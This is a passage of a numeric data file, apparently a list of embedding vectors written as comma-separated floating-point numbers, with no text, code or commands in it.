0.0053731226,0.05810309,-0.051636405,-0.056136396,0.01971738,-0.04405379,0.032271396,-0.010618337,0.0427336,0.05248175,0.006527784,-0.008810158,-0.05333958,0.0141660785,-0.06709936,0.011494101,-0.0075461455,-0.0069672023,0.07371906,-0.022166891,0.023739357,-0.01381832,-0.032756172,0.05253986,0.009096418,0.0003982625,-0.04763833,-0.031400073,-0.0041596675,0.017807756,0.00094601174,-0.0071294205,0.008493428,0.030083245,0.024011998,0.026203215,-0.02653281,-0.0033262155,0.0071382117,-0.03842601,-0.013646185,0.019125674,0.06328537,-0.0010345138,-0.008338746,-0.0087835435,-0.0028520073,-0.015982863,0.029696908,0.040482145,0.022425234,0.025566008,0.0006290725,0.053891093,0.0057056365,0.010647422,-0.00308608,-0.01923886,0.0063175135,0.014081576,-0.0037111975,0.059125252,-0.013774224,-0.021834377,0.0006549508,-0.042158928,-0.027974978,-0.023391752,0.0038948588,-0.07625938,0.02480656,-0.009862272,0.0255108,0.04386466,-0.008328421,0.034842715,0.019429801,0.039822597,-0.013341285,0.012436157,-0.004445498,-0.008709184,0.021793867,-0.033795994,-0.01223613,-0.03668473,0.01368109,0.026617259,-0.029472483,0.00035549246,0.035062965,-0.014551165,0.06849038,-0.02745319,-0.07175964,0.023462271,-0.0026197839,-0.03579258,-0.016756875,-0.035011895,-0.028781645,0.02449749,0.061639298,0.028515475,0.035272114,-0.009837599,-0.06721183,0.008277195,0.033854578,0.0413009,0.022123659,-0.004487629,-0.055604585,0.030292738,0.015547549,0.03417625,0.009080321,0.03918392,0.04918417,0.016018944,0.038844924,0.006620593,-0.07841391,0.06338958,0.018054629,0.028708398,0.013920494,-0.024521612,0.007994747,0.049924333,0.017604567,-0.029352227,0.044780176,0.040931355,-0.038084634,-0.046697102,-0.059119366,0.053932857,0.03905026,0.06849569,-0.052803066,-0.08798903,0.051722743,0.037699364,-0.011669058,0.044347603,0.029551316,0.1444625,0.006803393,0.015469536,0.03000027,-0.026906215,0.009103612,0.033105254,0.0028881172,-0.0467059,0.054717466,0.0056863814,-0.010445797,0.01165739,-0.06310689,0.008998676,0.04449827,-0.06687625,0.034666717,-0.0072357706,-0.048208687,-0.0106244385,0.016849346,-0.04515502,-0.0016775297,-0.0049906936,0.033063773,0.015561668,-0.07480695,-0.015585709,-0.011013967,-0.021481017,0.063346975,0.02732108,0.011387938,0.03769864,-0.033346172,0.071930476,-0.025163203,0.042100694,-0.028277036,-0.051008705,-0.02133208,-0.043756366,0.021833051,0.036434665,-0.0024768584,0.026951049,0.073401645,-0.014604599,0.012928978,0.016779702,-0.0010687015,0.06557851,-0.02133817,-0.0899879,0.024396839,0.011520412,-0.023976978,0.03290498,0.041217104,0.055496216,-0.04837215,0.052086137,-0.00085429626,-0.05807249,-0.018392833,0.032915793,-0.024532733,-0.040459037,-0.0028073646,-0.08382697,-0.018069647,0.031491797,-0.06001845,0.016585337,-0.008431963,0.019829074,0.008008472,-0.039780207,-0.022906993,-0.0015925337,0.016260982,-0.066729136,-0.015111343,0.03172346,0.028209334,0.01800178,0.034931358,0.0056711086,-0.046060957,0.0014919323,-0.0037552307,-0.040451765,0.044264648,0.015370826,-0.08049418,-0.000033143748,-0.042819023,0.03622595,-0.067293815,0.024992375,-0.04108822,-0.034004096,-0.020943264,-0.028350672,-0.069942884,-0.045185894,0.028982455,0.056526884,0.0120997345,0.0047549377,-0.036235176,-0.02198973,-0.011571529,-0.001954299,-0.006070784,0.0107875,-0.045167178,0.026874643,-0.0068360437,-0.01547851,-0.016882986,0.049581703,-0.016181981,-0.065464936,-0.064183906,0.019814968,-0.035672463,0.017040612,0.0344496,-0.03739645,-0.019871207,-0.058872603,0.010195335,-0.035549928,-0.023467835,-0.0077969623,0.0046888315,0.035824794,0.00068510004,-0.0024110505,0.0037979377,-0.02351238,-0.0060983477,-0.05912956,-0.08592392,0.004748205,0.03257774,0.07112577,-0.052378763,0.03753497,0.050035913,-0.015628915,0.060045496,-0.009343252,-0.015614612,0.033462346,0.020533148,-0.050151017,-0.0009454415,-0.00018952918,-0.059573673,0.054835957,-0.044225063,-0.04348984,-0.049354557,-0.0005246648,-0.07418084,0.084344216,-0.0801056,0.022945344,-0.03573372,-0.019563751,-0.024971418,0.03458943,0.041390136,-0.04927897,0.016583433,-0.0400627,0.009924902,-0.07396267,0.04222928,-0.037366338,0.04230278,0.040578235,0.07159402,0.024406614,-0.025800716,0.019088304,-0.0063277213,0.048338518,-0.010957932,0.013894104,0.052661683,0.051486958,-0.028855182,0.05598843,0.05191921,0.036446836,0.01904876,-0.016701022,0.0011640801,-0.011645833,0.006020989,-0.027611477,-0.02160665,0.0059242183,0.0046201856,0.007084617,-0.0112012895,0.039918337,-0.009921158,-0.0015228312,-0.052946933,-0.060684733,-0.030010963,0.036699988,0.013666294,0.02376654,-0.046114624,0.025259493,-0.01771474,0.035520952,0.052376717,0.0031675464,-0.040185478,0.02605431,-0.0017317849,0.0011580203,-0.0076622637,0.014141893,-0.05830344,0.05257248,-0.019589508,-0.0038812826,-0.0020273137,-0.014910087,-0.005122623,-0.04972728,-0.006469587,-0.008207559,0.016277654,0.027489873,0.003991731,0.032383468,0.05423869,0.007312411,0.011366902,-0.010796389,0.04806905,-0.01735281,-0.036620893,0.020198032,-0.0039251046,0.013706642,-0.05038348,-0.013546588,0.014663103,-0.013735749,0.081849106,0.007905127,0.011751234,-0.015375426,-0.022566026,0.00041568273,0.022373782,0.01768612,-0.00015089747,-0.025729707,0.016087035,-0.02701796,0.015636172,0.026894439,-0.04612339,0.025443567,-0.0040687253,-0.011562937,-0.02378975,-0.038850203,0.09723305,0.010262561,0.018865507,-0.015653968,-0.03251755,-0.04446004,0.013339201,-0.027515644,0.035358466,0.014278823,-0.037953667,0.007974795,-0.045017164,-0.013792415,0.062104203,0.0009676093,-0.032902606,0.02714311,-0.027550908,0.01217692,0.023164803,-0.03368348,-0.00129666,0.04428987,0.045317534,0.09442475,0.060409438,0.009327201,-0.00999392,0.060481906,-0.02575096,-0.04068265,0.0031497488,-0.007616593,-0.045950487],[0.0023700998,0.03784958,-0.17651023,-0.05278951,0.058347043,-0.034698978,0.09589544,0.019308176,-0.023007955,-0.039311644,-0.016033752,0.0050713406,0.096453816,0.019642893,0.0024343256,-0.019505084,0.010654476,-0.06323663,-0.0073471097,0.046911377,-0.034199465,0.0018384288,-0.0011787489,-0.05223789,0.061677262,0.0262752,-0.014276664,-0.010642027,-0.019559236,0.0034706488,-0.0059303404,-0.017806182,-0.014377384,0.0075687584,-0.07035725,-0.02515149,0.032871872,0.029832782,0.013348121,0.05165303,0.06273491,0.03513167,0.003847135,-0.0023300592,0.031054096,-0.0073308833,0.01085589,-0.025629964,0.0023261702,-0.047878616,-0.009948916,-0.0017265618,0.029365085,-0.019262755,0.10240543,0.043426044,-0.00020498502,0.054759238,-0.0062166667,-0.08322274,0.06875563,0.06808125,-0.11129543,0.05828343,-0.016964598,-0.00915229,-0.03699449,0.04796526,-0.002387554,-0.034078617,0.035385225,0.029532973,-0.03281624,0.03260418,-0.05328275,-0.019079888,-0.035535693,-0.017978927,-0.038130213,0.049060047,-0.012028071,-0.049250133,0.06288199,-0.020320417,0.04031696,0.008347906,0.025824772,0.01960829,-0.045500245,0.05404133,-0.005862105,-0.03044854,0.027040074,0.012043596,-0.0830915,0.016821945,-0.01289459,0.0029065886,-0.02349322,-0.030491302,-0.040798165,-0.00025812298,0.010041942,0.007611724,-0.019650199,0.043985736,0.030833714,0.04351026,-0.05233788,-0.040927775,-0.03787981,0.054851342,-0.039763097,0.0005816257,-0.056427248,-0.035724323,0.040478,-0.04083228,-0.007890203,0.01643798,-0.03590996,-0.04914257,-0.042485476,0.025883218,-0.017941756,0.0076419995,-0.04137177,0.026463445,-0.025607178,-0.04289272,0.026420994,-0.0069235237,-0.030932415,-0.04265111,0.042859666,0.043729473,-0.0066969804,-0.03619392,0.037613563,0.018716317,0.0064764884,0.010941619,-0.012591676,-0.050909404,0.013909694,-0.057743497,0.014558168,-0.015823731,-0.027416537,0.010525565,0.032786515,-0.00076131,-0.012202929,-0.015668772,0.017355822,-0.01076192,0.016692827,-0.00018824571,0.011515053,0.021367213,0.072128266,-0.015275415,0.0036099602,0.06356601,-0.011079878,-0.05376737,-0.045005456,0.052366372,-0.01927415,0.01649505,-0.0654204,-0.0083963685,0.002234068,-0.019746296,0.025637763,0.01149049,0.08709205,-0.045974493,-0.006990944,-0.017832937,0.030618358,-0.029497659,0.045891643,0.0012347264,-0.010451948,-0.016117133,-0.0071908184,-0.0049587595,-0.011996053,-0.023672735,0.046752814,-0.011874109,-0.08228567,-0.025532126,-0.03808439,-0.04767237,0.023527922,-0.017729532,0.0037161545,-0.034654446,-0.067444496,-0.018848762,-0.05509281,0.009400573,-0.08160688,0.04725991,0.0077368855,0.029486028,-0.048774675,0.047525078,0.053174272,0.02298939,0.016993169,0.05606052,-0.011957758,0.010167376,0.015869867,-0.02932801,-0.048629515,-0.0017596007,0.026352922,-0.038265817,-0.026221115,0.021834342,-0.016359786,-0.019319296,-0.013504066,0.006697826,-0.006574058,0.020722259,-0.007426566,-0.064467706,0.029777866,-0.0073077674,0.032313883,0.040280625,0.032715783,0.008687014,0.007539435,0.014108913,-0.011925234,0.050960574,-0.022874236,0.018507672,-0.01215381,-0.042902775,-0.0009742425,-0.0031340392,-0.007443332,0.039701592,0.025600815,0.026604762,0.014768672,-0.008106736,0.006010264,-0.06721618,-0.054134455,-0.008160103,0.03505474,0.0033646256,0.03839094,-0.014695725,0.008340807,-0.0005921286,-0.05625075,-0.043926746,0.014714619,0.0053918655,-0.040490508,-0.01792218,0.018133843,0.034095917,0.028143685,0.0536404,-0.017402515,0.008619936,-0.048322026,-0.042535055,-0.0219662,0.024876155,0.01652306,-0.050163917,-0.02632721,0.016058564,0.011888722,0.014559009,0.027081043,0.009845763,-0.007072802,0.0019425179,-0.0054036556,-0.0029717549,-0.03636537,0.02850086,-0.016945638,0.014387007,0.019713264,0.014460492,0.023682198,-0.041237675,0.021528348,0.047576126,0.058228884,0.022197256,0.013547739,-0.013228799,-0.0045220437,-0.014392285,0.028651744,-0.012660596,-0.04219281,-0.009436252,-0.02309504,0.010721015,-0.068023525,0.0044606407,0.018041275,0.020448903,0.034054294,-0.007673332,0.0146989105,-0.045621146,0.01737458,-0.022227965,-0.0072186976,0.06135822,-0.020387553,0.034222577,-0.017600602,-0.01602315,0.06935276,0.055164337,-0.0027652916,-0.05501131,0.0136383455,0.058245342,0.0067217974,0.029739553,0.021167219,0.023699585,0.0599211,-0.009581254,0.03751664,-0.004988323,-0.00073634385,0.04482184,-0.014255667,-0.05404298,0.04909289,0.05178598,-0.005490263,0.019351883,-0.025293913,-0.011835955,0.039165545,0.027477395,0.044480883,0.030035464,0.012120193,-0.0067957724,0.052650277,-0.001100494,-0.005725064,-0.025200043,-0.035786472,0.012233924,0.041478433,0.015874045,0.0037104455,0.025461826,-0.0010196507,-0.00476906,-0.046675302,-0.0050110994,-0.040413413,0.018384317,-0.049575485,0.026244178,0.021746928,-0.009526597,0.016344229,-0.003298981,-0.0060649836,-0.001646931,0.0062724017,-0.010466798,-0.029221013,-0.02895023,0.033473663,0.0060437657,-0.058222223,-0.023247363,-0.05448901,0.0051731654,0.046245176,-0.046637073,0.033906262,0.045874853,0.0018234483,0.041925523,-0.04410633,-0.094442025,0.008515233,-0.0027759788,-0.026378771,0.03896505,-0.031590726,-0.048119377,0.024290394,-0.02194681,0.008346643,0.06597558,0.003127739,-0.076198004,-0.0036979232,0.01474788,0.026902426,0.023595635,-0.008603726,-0.031129854,0.026069311,0.030221611,0.016693532,0.0019521243,0.028404359,0.025457758,0.013106943,0.05908175,0.012936002,-0.0595154,0.06785457,0.010093762,0.046929557,-0.017052822,-0.009228206,0.023116581,0.02342867,0.017023556,-0.006145992,0.060575403,0.010420434,-0.062313683,-0.027851745,-0.0627381,0.00763975,0.033006568,0.042787123,-0.028712625,-0.076197706,0.032202702,0.022087758,0.032226533,0.037076548,0.013698576,0.103018135,-0.046433277,0.004126127,0.016924977,0.02309429,0.030780932,-0.0065469323,0.006038811,-0.060211595,0.022105774,0.009682345,-0.038081136,0.016857933,-0.03573444,0.0079152025,0.06371278,-0.05800367,-0.008658404,0.029421594,-0.030774107,-0.0008169186,0.016216828,-0.040652465,-0.02873019,0.03451968,0.05042319,0.017734606,-0.043674152,-0.008194943,-0.000492525,-0.02318141,0.021152815,-0.003052818,-0.04732404,0.013674522,-0.016191978,0.060778033,0.021614958,0.041912742,-0.005917392,-0.022363316,-0.0046328236,-0.028396685,0.04512598,0.028550478,-0.008156038,-0.017009204,0.02299373,-0.0068997596,0.0046085515,0.021820825,0.0028393327,0.080900334,-0.05331133,-0.02890916,0.039479822,0.021036696,0.024229815,0.021322483,0.03133962,0.049521737,-0.08602957,0.04063773,0.042950023,0.002510312,0.0010928512,0.007298256,-0.034795653,-0.07006123,0.0017644431,-0.060609404,0.033653162,0.008607066,-0.105888195,0.04229777,0.00041972363,0.02953372,0.06676435,-0.074108966,0.017013622,0.009113063,-0.024357963,-0.014073352,0.029426262,0.0013687869,0.049921155,0.0043717586,0.06943952,0.057863697,-0.041993026,0.047249947,0.0093802195,0.011255217,0.033838887,0.017532116,-0.09904762,-0.012453361,-0.038079116,-0.001368301,-0.043100577,0.04848269,-0.006448849,-0.01982163,-0.04996604,-0.006873619,-0.06314778,-0.04060666,0.011354348,0.051704273,-0.015124404,0.021284508,0.0064240335,-0.0058021294,-0.0057874005,-0.0072632367,0.0138406595,0.052588645,-0.08123867,-0.026934525,-0.024807826,-0.04361636,-0.0054049827,0.0065615005,-0.006759549,-0.060046457,-0.065379374,0.03843147,-0.023302592,0.042987492,0.029737446,-0.068918586,0.01584624,-0.06836716,-0.0035522047,-0.013098567,-0.043614242,-0.03951533,-0.007107666,0.034650683,-0.017034097,-0.0077853757,0.0018594987,-0.0047519663,0.022254199,-0.03335736,-0.08622594,0.0108909635,0.048332814,0.05381351,-0.04445528,0.037441853,0.08930602,-0.014338668,0.04662022,0.018672569,0.0046084328,0.011977858,0.04298797,-0.015764523,0.022387676,-0.030826082,-0.012267521,0.0373257,0.0062966677,-0.021335786,-0.01990207,-0.006149519,-0.07898277,0.07714117,-0.08067097,0.04301623,-0.010353749,-0.010751951,-0.013632274,0.02401769,-0.0342183,-0.045839284,0.015831295,-0.041626878,0.033075854,-0.09192193,0.0047608376,-0.050811075,0.064920634,0.023580423,0.064850464,0.034756947,-0.00097182085,0.005360996,0.025284389,0.06099825,-0.026662638,0.01531181,0.08225609,0.017776161,-0.037807867,0.08004518,0.09098728,0.031318765,0.009184959,0.0101600615,0.03338533,-0.000555959,-0.0154148005,-0.012393496,-0.048181705,0.015565111,-0.0046690833,-0.0019530526,0.012852244,0.022684196,0.010364407,-0.021529151,-0.0027968658,-0.013364692,-0.021490967,0.0495326,0.019757632,0.023956379,-0.020114446,0.044050545,0.0066895355,-0.016879616,0.065851256,-0.010961103,-0.019391505,0.029656015,-0.00825389,0.023319779,-0.051733963,-0.010932405,-0.030483302,0.011113013,-0.0013737095,-0.032314897,-0.018316492,-0.037039366,-0.031800795,-0.017942138,0.00486502,-0.02710189,0.03585695,0.005177108,-0.029828222,-0.03953635,0.07657447,0.000058485988,0.015762469,-0.03146058,0.030293988,0.045757588,-0.030144248,0.02287712,-0.01565162,-0.03408255,-0.065217964,-0.017513612,-0.008554578,-0.008735152,0.047592897,0.035581704,0.0105165895,-0.016415969,-0.03955884,-0.019824252,0.0063760583,0.020513732,-0.012315574,0.0041983603,0.014753463,0.008968005,0.010248578,-0.0014332742,-0.050254703,0.0069066193,0.01655642,-0.03984145,-0.03288869,-0.033413596,0.070041485,0.008961723,0.038835365,0.016195845,-0.020772368,-0.07697267,-0.029179323,-0.022623373,0.040856592,0.0028313983,0.0062235002,-0.0027143622,-0.036768414,-0.013095451,0.05035777,-0.027103297,-0.052378926,-0.014724901,0.0056243064,-0.024451334,0.039179523,-0.03975121,0.019590478,0.015190337,0.043723725,0.101697505,0.03865325,0.0017110114,-0.035162807,0.013916241,-0.027308527,-0.038554616,-0.014974878,-0.008791927,-0.037932925],[0.041405763,0.013908974,-0.17728409,-0.07930555,0.107743286,-0.012533912,0.062022224,0.053714514,-0.030059852,-0.01354852,0.042890098,0.0017419254,0.077155896,-0.029566659,0.019598203,-0.049231257,-0.024405247,-0.024978843,-0.018128235,-0.016089808,-0.032036684,-0.034309626,-0.029178498,-0.028500859,0.06099879,0.019145703,-0.057692967,-0.049444303,-0.040837258,0.011701268,0.0072679515,-0.020267112,-0.03003063,-0.0063787564,-0.035155814,0.004263299,0.04431367,0.051558703,0.012926908,0.018524665,-0.0053194645,0.028659455,0.019915223,-0.027276125,0.050095055,0.024572931,0.012904113,-0.017212989,0.032570995,-0.072430916,-0.0033842279,0.017191593,0.064447336,0.022834495,0.088170916,0.026730556,-0.072186075,0.024132185,0.015248679,-0.066789165,0.0742421,0.057073835,-0.030220037,0.028769873,0.057216424,-0.016298365,0.0077293837,0.053703327,-0.004331075,-0.07067974,-0.00018287887,-0.003894015,-0.014741125,0.05182636,-0.06119393,0.016981656,-0.024082623,-0.030734155,-0.01500515,0.04801206,0.012373853,-0.008884943,0.07234672,0.023675293,0.046546757,-0.03853758,-0.03074933,0.019942265,0.0055863145,0.07724799,0.004246698,-0.021429649,0.049568057,0.00031699464,-0.04994859,0.043436114,-0.015740518,-0.019518705,-0.0468384,-0.02481313,-0.065524556,0.0102027515,0.015905354,0.012395118,0.03526194,0.020397672,-0.0060235076,0.04899359,-0.044047706,-0.009824761,-0.049920604,0.050795004,-0.035128262,-0.008600872,0.0015561441,-0.024895197,0.04444398,-0.028426655,-0.022848848,0.051327497,0.01187634,0.0012320086,0.0027437524,0.03413799,-0.017666582,0.013195772,-0.060693793,-0.0023457918,-0.06130881,-0.026626034,-0.014281566,-0.026656905,0.004721629,-0.053875953,0.015696252,0.084582016,-0.026890397,-0.042846266,-0.005994584,0.02518807,0.03619841,-0.025112616,-0.015139578,-0.010635055,-0.016969593,-0.04568426,0.023636991,0.0069782627,-0.03467147,0.03863549,0.06446778,0.023842908,-0.02374524,0.0011971013,0.039837778,0.025086071,-0.025437865,-0.023364857,-0.011761461,0.031276766,-0.0070063644,0.034354594,-0.028684134,0.06487574,0.0056897253,-0.039934848,-0.0043984675,-0.013882935,0.027296683,0.071659155,-0.063699916,0.01069129,0.031594228,0.0034016038,0.017169328,0.0021287051,0.08049401,-0.053837728,-0.0072382707,-0.0101437,0.055937793,-0.0672394,0.008187522,0.013766866,-0.03153141,-0.022045018,0.025882006,-0.024394626,-0.01636225,-0.0521346,0.041312598,0.0046275235,-0.03616492,-0.025849694,-0.077294424,-0.048314143,0.0005615344,-0.04942088,0.038731754,-0.041174635,-0.04647045,0.033204954,-0.05102449,-0.0006263624,-0.07880291,0.07943765,-0.017932707,0.025825681,-0.038461186,0.011728041,0.031828657,-0.005923856,0.0035910932,0.061516374,-0.0017949321,0.0048056035,-0.00020438126,-0.020654112,-0.037453376,0.022722933,0.02956238,-0.005046819,0.025021745,-0.011188453,0.004210097,-0.004432801,-0.074788064,0.040303536,0.041485943,-0.0141981505,-0.011598912,-0.09629693,0.027354274,-0.011466618,0.00362548,0.03963794,0.01873717,0.03064343,0.009224174,0.033482336,0.001730106,0.06376975,-0.020104377,0.010096007,-0.057705883,-0.08820492,-0.0007546261,-0.03211638,0.0341511,0.029785315,0.053561825,0.0072891754,0.022977535,0.028113421,0.019918116,-0.02779975,-0.0017873428,0.00862565,0.011150785,0.032798335,0.037809305,0.006011061,0.013694864,-0.013151151,-0.0027846536,-0.033721045,-0.02142757,-0.04814808,-0.005511882,-0.014159255,0.05848336,0.04530362,0.026216935,0.017863525,0.034452807,0.06060478,-0.014500047,-0.026086774,-0.03907432,-0.033047643,-0.019544542,-0.018835261,-0.023627836,0.036023725,-0.020213153,-0.007303061,-0.012695875,-0.015391363,0.02078855,-0.010172897,-0.010718825,0.0060864883,-0.036715303,0.02354092,-0.066475056,0.05241826,0.055172432,-0.07896289,0.05865043,-0.046047,0.03322201,0.039183956,0.06655993,0.048282508,-0.014880505,-0.02965203,-0.005501532,0.014596201,0.015443512,-0.008864217,-0.049479067,-0.004313387,-0.015359598,-0.020009104,-0.048030253,0.0204602,0.044574358,0.0061154077,0.05380921,-0.011378393,0.026731756,-0.043821312,0.0148808425,-0.03548714,-0.029611519,0.03221507,-0.013656902,-0.004347719,-0.026187548,-0.009553037,0.05972351,0.01668861,0.0007640816,-0.06724942,-0.02337062,0.05199685,-0.025920708,0.03821002,0.0310015,0.020549804,-0.001202781,-0.039057247,0.014550976,-0.017702863,0.0036255512,0.04511223,-0.052339785,-0.0034691126,0.021042492,-0.016055671,-0.012417345,0.026490247,-0.034492448,0.0005194248,0.0260417,0.008672946,0.031353872,0.06419181,0.007969878,-0.0011492447,0.05605842,0.039985057,-0.001082468,0.0140177645,-0.020719055,0.025619406,0.03626898,-0.001696547,-0.012461858,0.01604231,0.0022281166,0.00008999875,-0.008339384,0.046925668,-0.020605434,-0.0123562785,-0.06716978,-0.020008745,-0.024124384,0.027476184,0.029259106,0.02995001,-0.02702605,0.03479659,0.0313129,-0.010077207,-0.018588673,-0.07278061,-0.003973338,0.01260868,-0.03733635,-0.0040437942,-0.07270959,0.01053435,0.06254464,-0.024833275,0.011766279,0.030171135,0.03366491,0.022624163,-0.030101601,-0.077495344,0.009316513,0.019905176,-0.037813995,0.017098898,-0.05097902,-0.0055774683,0.015986787,0.022699762,0.031458464,0.033666763,-0.025077477,-0.047391802,0.0550232,0.0052018184,0.047744177,-0.028037021,-0.028040994,-0.02019343,0.06974377,-0.0022511634,0.0152435815,-0.004674684,-0.0013020753,0.063657224,0.011534964,0.055721626,0.018526228,-0.059136752,0.048859086,0.040279493,-0.008889897,-0.0008705752,-0.02114416,0.052931294,0.016183307,0.05504155,0.021674043,0.01665395,0.0001223124,-0.037706275,0.004983856,-0.029478244,0.023969637,0.06890064,0.046956614,-0.02050307,-0.0689495,0.036209382,-0.04222529,0.008714116,0.005926686,-0.0045718225,0.056117255,-0.021251269,0.034147575,-0.008473167,-0.030325951,0.0043538967,-0.015300882,-0.014538226,-0.06836063,-0.007021689,0.005535,-0.012073568,-0.0137412455,-0.02839155,0.027432222,0.077002406,-0.040132023,-0.009115797,-0.0013910476,-0.06557687,0.016149547,0.008018455,-0.021096101,0.0035490254,-0.004453419,0.039840665,0.034191143,0.0071672895,-0.012559231,-0.041456632,0.029187795,0.033505507,0.03139706,-0.04330961,-0.0073769214,-0.005838669,0.030615347,0.021952726,0.005014497,-0.011096023,-0.011142413,0.013537063,-0.024985198,0.032137997,-0.004029384,0.0039527277,-0.0035748584,0.07254452,-0.00633062,0.03069699,0.033510815,0.008926497,0.07620341,-0.08588803,-0.013803726,-0.011390544,-0.029784234,0.016209632,0.030256452,0.02008683,0.05993853,-0.062705256,0.037076127,0.028044758,-0.038950566,0.000764344,0.019769244,-0.0330595,-0.013266184,-0.05663741,-0.045395106,0.02407775,0.015889095,-0.05817484,0.035713915,-0.023565413,0.01821686,0.052901655,-0.05522743,0.02918836,0.024813114,-0.005544219,-0.039807953,0.01751303,0.008557397,0.0007987994,0.0010889346,0.058555275,0.019290296,-0.032497156,0.027520014,-0.0038977284,-0.0029161628,0.053130336,0.04640116,-0.105762646,0.01115402,-0.02060166,0.030669346,-0.0014136112,0.04795206,-0.019453336,-0.040619202,-0.027304966,0.032351892,-0.03548437,0.011947775,-0.00054744724,0.08185912,-0.0005995978,-0.02097941,-0.042970132,-0.026151903,-0.011933576,-0.019240642,0.02657187,0.02867298,-0.024095772,-0.012658405,-0.04232524,-0.0022152297,0.0034879744,0.0120753795,-0.0047027715,-0.048819773,-0.058046103,0.08083712,-0.02026138,0.03805152,0.016657047,-0.014934489,0.006394159,-0.05506669,-0.00899049,0.033335824,-0.030778881,-0.0071943677,-0.005332395,0.028471004,-0.030119179,-0.05259903,0.037168555,-0.0038044332,-0.00873347,-0.046317678,-0.04593297,-0.0044336077,0.016184524,0.04968105,-0.0748122,0.06920732,0.02457523,-0.018381216,0.023103017,-0.0059351437,-0.008057615,0.0021211745,0.020098003,0.009886551,-0.039543077,0.032710537,0.0051969686,0.047267504,-0.039132703,-0.0065664477,-0.034345467,-0.05100298,-0.10822473,0.05094335,-0.042123448,0.024943044,0.018936928,-0.04516616,-0.032790523,-0.00005658709,0.060399167,-0.0643412,0.011697967,-0.029204963,-0.012942468,-0.07100817,0.0016820529,-0.03492161,0.035006344,0.017835435,0.022308018,0.049033564,-0.018481407,-0.020421479,0.021998184,0.04409001,-0.067839995,-0.0012262064,0.08791385,0.03432425,0.013026525,0.049429666,0.037754204,0.021830784,-0.006875467,0.010247756,0.0059212106,0.02237095,0.0007065958,-0.025619227,0.0026225192,0.03789823,-0.0032559321,0.020174894,0.01978941,-0.013631745,-0.004767407,-0.028587012,-0.002140153,-0.019630684,-0.01929909,0.069180734,-0.02815416,-0.015042039,-0.01957395,0.014776785,0.009520919,-0.014974548,0.040039957,0.02199449,-0.027421884,-0.0530266,-0.028954126,0.032232985,-0.07446267,-0.028361851,-0.06312056,0.036759634,-0.0426118,-0.014399222,-0.018620372,-0.068335816,-0.041944526,-0.0071831173,-0.023237955,0.016327841,0.037922382,0.0031444654,-0.011574777,-0.030682279,0.045723062,-0.0039024523,0.027850928,0.011854441,0.018389277,0.016947225,0.026708193,0.045497984,-0.00047897824,0.01026986,-0.061045144,-0.05416355,-0.016162476,-0.046908345,0.027453931,0.017576493,0.020740328,-0.044160407,-0.03810693,0.0026331104,-0.018561997,0.01903917,-0.023463225,-0.013595741,-0.016981093,-0.026316414,0.009199072,0.015702361,-0.04739252,0.02345787,0.005022854,-0.006717519,-0.010830698,-0.045342546,0.048275743,-0.018501552,0.011538229,-0.0030627043,-0.0073092026,-0.062838934,0.007559178,-0.02698607,-0.0020809085,-0.000998686,0.038413927,-0.029778888,-0.003242307,-0.020084197,0.056797527,0.019413942,-0.040832948,0.028649865,0.0114410175,-0.014976243,0.03904243,0.021014957,-0.023334326,-0.009433459,0.018120594,0.10297254,0.0699996,0.04388507,-0.049693547,0.058538914,-0.035404027,-0.058852542,-0.035130113,-0.052078743,0.0110351825],[0.024955563,0.056327637,-0.19003397,-0.09209297,0.044794485,-0.022961931,0.025371164,0.015527788,-0.07642672,-0.034587372,-0.011382402,0.009149089,0.099552006,0.027544422,-0.0035572245,-0.03159146,-0.02574881,0.002562166,0.003159894,0.02038609,-0.01145654,-0.027558176,-0.013442201,0.011229696,0.045459997,0.044118334,0.001231556,-0.06467703,-0.041667808,0.0042958125,0.04514677,-0.042579506,-0.026603699,0.0089306515,-0.069568,-0.058612656,0.009140981,0.0222763,-0.00025641828,0.03347438,0.06407254,0.019096425,-0.0073542055,-0.034204084,-0.020629227,-0.013988588,0.051370192,-0.033830203,0.010747509,-0.054415725,-0.026182534,-0.024998944,0.0076729236,0.028891271,0.10075968,0.0701058,-0.01568938,0.007919858,0.010429736,-0.08316889,0.08729534,0.0630975,-0.040590774,0.06528164,0.024132885,-0.037677605,-0.05911236,0.025139812,-0.03476173,-0.0771169,0.05985905,-0.04420157,-0.03147537,0.0052654697,-0.04092232,0.0012473839,-0.024668353,0.013336811,0.0019409723,0.06313771,0.03802944,-0.032836672,0.079445645,0.029880702,0.017339906,-0.020800265,-0.016317492,-0.041680958,-0.044822015,0.05140963,-0.0075224773,0.009355651,0.017174011,-0.019678673,-0.045730025,0.014399446,0.009197537,-0.012062551,-0.02139797,-0.0056524505,-0.09777076,-0.015692433,-0.0032031275,-0.010183321,0.018858988,0.0384404,-0.008213736,0.016623836,-0.011579743,-0.004870335,-0.017178234,0.017599232,-0.070048556,-0.01923798,-0.023481393,-0.009255865,0.06194719,-0.01667507,-0.01355071,0.024426535,-0.027017582,-0.013049694,-0.017972838,0.022328718,-0.022355305,0.020424407,-0.05766709,0.010304552,-0.036688175,-0.014290625,0.02972491,0.0008567143,-0.059949603,0.009668636,0.023369506,0.051205598,-0.03997963,-0.04122143,0.0076558,0.039449666,0.023977818,-0.015747912,-0.031037105,-0.031771783,0.0037705365,-0.034159146,0.041191164,-0.039384764,-0.031937346,-0.0010125499,0.019767366,0.036943868,-0.02174837,-0.004873034,-0.00411273,-0.003065915,0.017429931,-0.019118704,-0.008021971,0.009561046,0.00557857,0.018801073,-0.043389574,0.046610158,-0.0106601175,-0.03802631,-0.016513417,0.05233129,0.01016499,0.0069774725,-0.054842364,0.009468903,0.008777559,0.009572391,0.047048587,-0.011401053,0.08357088,-0.0216781,0.017107405,-0.037640512,0.031898666,-0.0470571,0.07257962,0.015732346,-0.024857737,-0.010033159,0.00064662704,-0.03776187,0.02425166,-0.04415278,0.018970046,-0.022154737,-0.033938702,-0.0023546496,-0.044936035,-0.0654782,0.04920827,-0.025907397,0.028269555,-0.040021427,-0.009461658,-0.004592772,-0.050416443,0.0048545296,-0.05982575,0.06180724,0.009094992,0.016972013,-0.070073105,0.050949454,0.05568638,0.0012858778,0.016947888,0.049305547,-0.008481667,-0.0135801,0.022508435,0.0003301397,-0.02718612,-0.022592694,0.010494228,-0.024317577,-0.0010101356,-0.0020471858,0.035275016,0.0007601849,-0.017404435,0.009036903,0.002951788,-0.0138671985,-0.03291971,-0.050890338,0.045111604,-0.04392546,0.05534268,0.04669374,-0.0019595234,0.02783621,0.020666176,0.0110303555,0.0035250278,0.008463846,0.006419544,0.009049685,-0.019568818,-0.03022887,0.00030345612,-0.025728066,0.0027531083,0.08831899,0.0062847957,-0.020379324,0.05170297,-0.0013623765,0.02243459,-0.033616368,-0.037408333,0.027909525,0.0037951588,-0.0055145985,0.0382383,-0.020680875,-0.025780914,-0.05270241